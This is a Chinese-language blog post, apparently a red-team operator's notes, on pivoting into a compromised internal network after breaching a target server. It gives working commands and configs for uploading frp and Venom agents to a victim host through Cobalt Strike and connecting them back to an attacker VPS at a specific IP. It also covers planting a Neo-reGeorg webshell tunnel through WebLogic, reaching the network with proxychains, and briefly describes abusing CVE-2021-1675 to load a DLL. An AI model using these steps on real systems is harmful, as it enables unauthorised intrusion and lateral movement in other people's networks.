<!DOCTYPE html>
<html lang='en' ><meta charset="utf-8">
<meta name="viewport" content="width=device-width">


<title>内网端口转发和socks连接 | DDTT95</title>

<meta name="generator" content="Hugo Eureka 0.8.3" />
<link rel="stylesheet" href="/css/eureka.min.css">
<script defer src="/js/eureka.min.js"></script>

<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="preload"
  href="https://fonts.googleapis.com/css2?family=Lora:wght@400;600;700&family=Noto+Serif+SC:wght@400;600;700&display=swap"
  as="style" onload="this.onload=null;this.rel='stylesheet'">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@10.1.0/build/styles/solarized-light.min.css"
   media="print"
  onload="this.media='all';this.onload=null" crossorigin>
<script defer src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@10.1.0/build/highlight.min.js"
   crossorigin></script>

<script defer src="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.14.0/js/all.min.js"
   integrity="sha256-uNYoXefWRqv&#43;PsIF/OflNmwtKM4lStn9yrz2gVl6ymo="  crossorigin></script>




<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css"
   integrity="sha384-AfEj0r4/OFrOo5t7NnNe46zW/tFgW6x/bCJG8FqQCEo3&#43;Aro6EYUG4&#43;cU&#43;KJWu/X"  media="print"
  onload="this.media='all';this.onload=null" crossorigin>
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.js" 
  integrity="sha384-g7c&#43;Jr9ZivxKLnZTDUhnkOnsh30B4H0rpLUpJ4jAIKs4fnJI&#43;sEnkvrMWph2EDg4"  crossorigin></script>
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/contrib/auto-render.min.js"
   integrity="sha384-mll67QQFJfxn0IYznZYonOWZ644AWYC&#43;Pt2cHqMaRhXVrursRwvLnLaebdGIlYNa"  crossorigin></script>
<script>
  document.addEventListener("DOMContentLoaded", function () {
    renderMathInElement(document.body, {
      delimiters: [
        { left: "$$", right: "$$", display: true },
        { left: "$", right: "$", display: false },
        { left: "\\(", right: "\\)", display: false },
        { left: "\\[", right: "\\]", display: true }
      ],
    });
  });
</script>


<script defer src="https://cdn.jsdelivr.net/npm/mermaid@8.9.2/dist/mermaid.min.js" 
  integrity="sha256-Zmpaaj&#43;GXFsPF5WdPArSrnW3b30dovldeKsW00xBVwE="  crossorigin></script>


<link rel="icon" type="image/png" sizes="32x32" href="/images/icon_hu64421c6c7700f606f0ad45d807017b09_5843_32x32_fill_box_center_3.png">
<link rel="apple-touch-icon" sizes="180x180" href="/images/icon_hu64421c6c7700f606f0ad45d807017b09_5843_180x180_fill_box_center_3.png">

<meta name="description"
  content="内网端口转发和socks连接">
<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "BreadcrumbList",
  "itemListElement": [{
      "@type": "ListItem",
      "position": 1 ,
      "name":"Posts",
      "item":"/posts/"},{
      "@type": "ListItem",
      "position": 2 ,
      "name":"内网端口转发和socks连接",
      "item":"/posts/11/"}]
}
</script>



<script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "/posts/11/"
    },
    "headline": "内网端口转发和socks连接 | DDTT95","datePublished": "2021-10-10T00:00:00+00:00",
    "dateModified": "2021-10-10T00:00:00+00:00",
    "wordCount":  193 ,
    "author": {
        "@type": "Person",
        "name": ["DT"]
    },
    "publisher": {
        "@type": "Person",
        "name": "C. Wang",
        "logo": {
            "@type": "ImageObject",
            "url": "/images/icon.png"
        }
        },
    "description": "内网端口转发和socks连接"
}
</script><meta property="og:title" content="内网端口转发和socks连接 | DDTT95" />
<meta property="og:type" content="article" />


<meta property="og:image" content="/images/icon.png">


<meta property="og:url" content="/posts/11/" />



<meta property="og:description" content="内网端口转发和socks连接" />



<meta property="og:locale" content="en" />




<meta property="og:site_name" content="DDTT95" />






<meta property="article:published_time" content="2021-10-10T00:00:00&#43;00:00" />


<meta property="article:modified_time" content="2021-10-10T00:00:00&#43;00:00" />



<meta property="article:section" content="posts" />


<meta property="article:tag" content="内网" />

<meta property="article:tag" content="端口转发" />





<body class="flex flex-col min-h-screen">
  <header class="fixed flex items-center w-full min-h-16 pl-scrollbar z-50 bg-secondary-bg shadow-sm">
    <div class="w-full max-w-screen-xl mx-auto"><script>
    let storageColorScheme = localStorage.getItem("lightDarkMode")
    if (((storageColorScheme == 'Auto' || storageColorScheme == null) && window.matchMedia("(prefers-color-scheme: dark)").matches) || storageColorScheme == "Dark") {
        document.getElementsByTagName('html')[0].classList.add('dark')
    }
</script>
<nav class="flex items-center justify-between flex-wrap px-4 py-4 md:py-0">
    <a href="/" class="mr-6 text-primary-text text-xl font-bold">DDTT95</a>
    <button id="navbar-btn" class="md:hidden flex items-center px-3 py-2" aria-label="Open Navbar">
        <i class="fas fa-bars"></i>
    </button>

    <div id="target"
        class="hidden block md:flex md:flex-grow md:justify-between md:items-center w-full md:w-auto text-primary-text z-20">
        <div class="md:flex md:h-16 text-sm md:flex-grow pb-4 md:pb-0 border-b md:border-b-0">
            <a href="/#about" class="block mt-4 md:inline-block md:mt-0 md:h-(16-4px) md:leading-(16-4px) box-border md:border-t-2 md:border-b-2  border-transparent  mr-4">关于我</a>
            <a href="/posts/" class="block mt-4 md:inline-block md:mt-0 md:h-(16-4px) md:leading-(16-4px) box-border md:border-t-2 md:border-b-2  selected-menu-item  mr-4">文章</a>
            <a href="/docs/" class="block mt-4 md:inline-block md:mt-0 md:h-(16-4px) md:leading-(16-4px) box-border md:border-t-2 md:border-b-2  border-transparent  mr-4">文档</a>
        </div>

        <div class="flex">
            <div class="relative pt-4 md:pt-0">
                <div class="cursor-pointer hover:text-eureka" id="lightDarkMode">
                    <i class="fas fa-adjust"></i>
                </div>
                <div class="fixed hidden inset-0 opacity-0 h-full w-full cursor-default z-30" id="is-open">
                </div>
                <div class="absolute flex flex-col left-0 md:left-auto right-auto md:right-0 hidden bg-secondary-bg w-48 rounded py-2 border border-tertiary-bg cursor-pointer z-40"
                    id='lightDarkOptions'>
                    <span class="px-4 py-1 hover:text-eureka" name="Light">Light</span>
                    <span class="px-4 py-1 hover:text-eureka" name="Dark">Dark</span>
                    <span class="px-4 py-1 hover:text-eureka" name="Auto">Auto</span>
                </div>
            </div>
        </div>
    </div>

    <div class="fixed hidden inset-0 opacity-0 h-full w-full cursor-default z-0" id="is-open-mobile">
    </div>

</nav>
<script>
    
    let element = document.getElementById('lightDarkMode')
    if (storageColorScheme == null || storageColorScheme == 'Auto') {
        document.addEventListener('DOMContentLoaded', () => {
            window.matchMedia("(prefers-color-scheme: dark)").addEventListener('change', switchDarkMode)
        })
    } else if (storageColorScheme == "Light") {
        element.firstElementChild.classList.remove('fa-adjust')
        element.firstElementChild.setAttribute("data-icon", 'sun')
        element.firstElementChild.classList.add('fa-sun')
    } else if (storageColorScheme == "Dark") {
        element.firstElementChild.classList.remove('fa-adjust')
        element.firstElementChild.setAttribute("data-icon", 'moon')
        element.firstElementChild.classList.add('fa-moon')
    }

    document.addEventListener('DOMContentLoaded', () => {
        getcolorscheme();
        switchBurger();
    });
</script>
</div>
  </header>
  <main class="flex-grow pt-16">
    <div class="pl-scrollbar">
      <div class="w-full max-w-screen-xl lg:px-4 xl:px-8 mx-auto">


<div class="grid grid-cols-2 lg:grid-cols-8 gap-4 lg:pt-12">
    <div
        class="col-span-2  lg:col-span-6 bg-secondary-bg rounded px-6 py-8">
        <h1 class="font-bold text-3xl text-primary-text">内网端口转发和socks连接</h1>
        <div class="flex flex-wrap flex-row items-center mt-2 text-tertiary-text">
    <div class="mr-6 my-2">
        <i class="fas fa-calendar mr-1"></i>
        <span>2021-10-10</span>
    </div>
    <div class="mr-6 my-2">
        <i class="fas fa-clock mr-1"></i>
        <span>1 min read</span>
    </div>
    
    
    <div class="mr-6 my-2">
        <i class="fas fa-folder mr-1"></i>
        
        <a href="/categories/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91/" class="hover:text-eureka">端口转发</a>
        
    </div>
    

    
</div>
        
        
        

        <div class="content">
            <h1 id="内网端口转发和socks连接">内网端口转发和socks连接</h1>
<p>端口转发</p>
<p>在自己的vps上运行fprs，服务器是Linux</p>
<pre><code>./frps -c frps.ini
</code></pre>
<p>上传一个frp-window到被攻击的内网主机，这台主机因为是内网机器我们不能直接访问，通过打下对方的服务器进行横向移动拿到对方的一台内网主机（cs上线）再在对方的主机上传一个frpc.exe和frpc.ini，配置文件内容如下，再在cs运行frpc.exe即可完成内网端口的转发</p>
<pre><code>shell cmd.exe /c frpc.exe -c frpc.ini
</code></pre>
<p>建立内网socks连接</p>
<p>在往对面的内网主机上传frpc.exe后再上传一个socks代理的配置文件，文件如下，再建立连接</p>
<pre><code>shell cmd.exe /c frpc.exe -c frp_proxy.ini
</code></pre>
<p>再访问我的vps加指定的远程端口即可连接上对方的内网主机</p>
<p>**这个时候我已经成为了对方内网的一台虚拟注意，我可以任意访问内网的其他主机</p>
<p>下载服务端的frps-Linux和客户端的frpc-windows</p>
<p>服务的的配置文件frps.ini</p>
<pre><code>[common]
bind_addr = 0.0.0.0
bind_port = 7000
# auth token
token = 48484
</code></pre>
<p>内网端口转发配置客户端fpr-windows文件frpc.ini</p>
<pre><code>[common]
server_addr = 127.0.0.1
server_port = 7000
token = 48484

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 80
remote_port = 6000
</code></pre>
<p>与内网建立socks连接配置文件，新建一个文件frp_proxy.ini</p>
<pre><code>[common]
server_addr = 137.220.34.205
server_port = 7000
token = 48484
[socks5]
type = tcp
remote_port = 6000
plugin = socks5
# 设置账号密码
# plugin_http_user = abc
# plugin_http_passwd = abc

# plugin = socks5
# plugin_user = abc
# plugin_passwd = abc
</code></pre>
<h2 id="venom">venom</h2>
<p>往vps上传admin_linux_x64</p>
<p>监听端口</p>
<pre><code>./admin_linux_x64 -lport 5555
</code></pre>
<p>对面机器上传一个agent.exe，执行</p>
<pre><code>agent.exe -rhost vps-ip -rport 5555
</code></pre>
<p><img src="11/image.png" alt=""></p>
<p>开启一个socks端口即可访问内网机器</p>
<pre><code>socks 7777
</code></pre>
<h2 id="webshell-http代理-neo-regeorg">webshell-http代理-Neo-reGeorg </h2>
<p>1、设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器</p>
<pre><code>$ python neoreg.py generate -k password

    [+] Create neoreg server files:
       =&gt; neoreg_servers/tunnel.jspx
       =&gt; neoreg_servers/tunnel_compatibility.jspx
       =&gt; neoreg_servers/tunnel.php
       =&gt; neoreg_servers/tunnel.ashx
       =&gt; neoreg_servers/tunnel.aspx
       =&gt; neoreg_servers/tunnel.jsp
       =&gt; neoreg_servers/tunnel_compatibility.js
</code></pre>
<p>2、将jsp文件复制通过weblogic上传到网站跟目录</p>
<p><img src="11/1_image.png" alt=""></p>
<p>3、 使用 neoreg.py 连接 WEB 服务器，在本地建立 socks5 代理，默认代理端口1080，可加-p指定端口。-l让其他机器也可以使用这个代理</p>
<pre><code>$ python3 neoreg.py -k 123456 -u http://xx/indexx.jsp -l 0.0.0.0 --skip
+------------------------------------------------------------------------+
  Log Level set to [DEBUG]
  Starting socks server [127.0.0.1:1080]
  Tunnel at:
    http://xx/indexx.jsp
+------------------------------------------------------------------------+
</code></pre>
<p>如果打上了一台内网的机器，可以负载均衡，把流量分给内网的一台机器-r &lt; redirect_url&gt;</p>
<pre><code>https://github.com/L-codes/Neo-reGeorg
</code></pre>
<p><strong>Step 3.</strong> 使用 proxychains代理即可代理进去</p>
<p>proxychains配置文件&ndash;/etc/proxychains </p>
<p>配置文件中的这个参数proxy_dns得注释掉</p>
<p>远程端口转发：把本地的445端口转发到vps的445端口上，vps启动匿名共享服务，CVE2021-1675，与别的机器的打印机建立连接，让打印机去访问你上线那台机器的共享文件夹，加载dll，上线的那台机器做远程端口转发到vps上</p>

        </div>
        
        <div class="my-4">
    
    <a href="/tags/%E5%86%85%E7%BD%91/" class="inline-block bg-tertiary-bg text-sm rounded px-3 py-1 my-1 mr-2 hover:text-eureka">#内网</a>
    
    <a href="/tags/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91/" class="inline-block bg-tertiary-bg text-sm rounded px-3 py-1 my-1 mr-2 hover:text-eureka">#端口转发</a>
    
</div>
        
        
        


        
        
        <div class="py-2">
    
    <div class="flex flex-col md:flex-row items-center my-8">
        <a href="/authors/dt/" class="w-24 h-24 md:mr-4">
            
            
            <i class="fas fa-user-circle fa-6x"></i>
            
        </a>
        <div class="w-full md:w-auto mt-4 md:mt-0">
            <a href="/authors/dt/" class="block font-bold text-lg pb-1 mb-2 border-b">DT</a>
            <span class="block pb-2"></span>
            
        </div>
    </div>
    
</div>
        
        
        
        



    </div>
    
    <div class="col-span-2">
        
        
        <div class="sticky top-16 z-10 hidden lg:block px-6 py-4  bg-primary-bg ">
    <span class="text-lg font-semibold">On This Page</span>
</div>
<div class="sticky-toc hidden lg:block px-6 pb-6 ">
    <nav id="TableOfContents">
  <ul>
    <li><a href="#venom">venom</a></li>
    <li><a href="#webshell-http代理-neo-regeorg">webshell-http代理-Neo-reGeorg </a></li>
  </ul>
</nav>
</div>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        enableStickyToc();
    });
</script>
        
    </div>
    

    
    
</div>
<script>
    document.addEventListener('DOMContentLoaded', ()=>{
        hljs.initHighlightingOnLoad();
    })
</script>

      </div>
    </div>
    
  </main>
  <footer class="pl-scrollbar">
    <div class="w-full max-w-screen-xl mx-auto"><div class="text-center p-6 pin-b">
    <p class="text-sm text-tertiary-text">&copy; 2021 <a href="https://www.wangchucheng.com/">C. Wang</a> and <a href="https://www.ruiqima.com/">R. Ma</a>
 &middot;  Powered by the <a href="https://github.com/wangchucheng/hugo-eureka" class="hover:text-eureka">Eureka</a> theme for <a href="https://gohugo.io" class="hover:text-eureka">Hugo</a></p>
</div></div>
  </footer>
</body>

</html>